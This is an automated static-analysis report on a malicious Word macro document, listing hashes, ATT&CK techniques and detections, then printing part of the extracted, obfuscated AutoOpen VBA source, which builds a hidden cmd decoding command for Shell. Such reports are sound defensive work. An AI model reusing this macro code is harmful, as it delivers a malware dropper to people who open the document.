Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3fd39b607e3a59df…

MALICIOUS

Office (OLE)

Size: 110.9 KB | Created: 2018-08-10 18:55:00 | Authoring application: Microsoft Office Word | First seen: 2018-08-14
MD5: 1a5f00c17bd40da4b6ab785cd6559aab
SHA-1: af7bc0e2bbf1f60fec235976d2468caf982e4310
SHA-256: 3fd39b607e3a59dfb9e78bde03a6fde35d3f8cf0d9af00a0ee11b26ac762610d
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs automatically when the document is opened. The macro calls the Shell function on a command line that is assembled at runtime from many concatenated string fragments spread across helper functions, which indicates it is most likely a downloader or dropper for a second-stage payload. The AutoOpen entry point together with the critical ClamAV detection strongly suggests malicious intent.

Heuristics (5)

  • ClamAV: Doc.Malware.Generic-6666973-0 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
  • VBA macros detected (severity: medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (source: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12762 bytes
SHA-256: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sgn(211519271)
   TypeName 95
   TypeName dwcBFA
   TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
   TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
   TypeName Oct(7415 + wBbjOc)
   TypeName Hex(820)
End Sub


Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
   TypeName 5
   TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
   TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + "  =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
   TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
   TypeName Log(2157)
   TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
   TypeName Atn(9305)
   TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
   TypeName Cos(86757 / Coilz)
   TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
   TypeName CSng(MRbjP)
   TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
   TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
   TypeName CStr(MktFL)
   TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
   TypeName 77
   TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
   TypeName TFQzX
   TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
   TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
   TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
   TypeName 66
   TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
   TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
   TypeName Rnd(PNNti)
   TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
   TypeName 1059
   TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
   TypeName Round(18040 * zMfzwu)
   TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
   TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
   TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
   TypeName Rnd(201076278)
   TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
   TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
   TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
   TypeName Sqr(YpNCC)
   TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
   TypeName CLng(KwzmUa)
   TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32,"
... (truncated)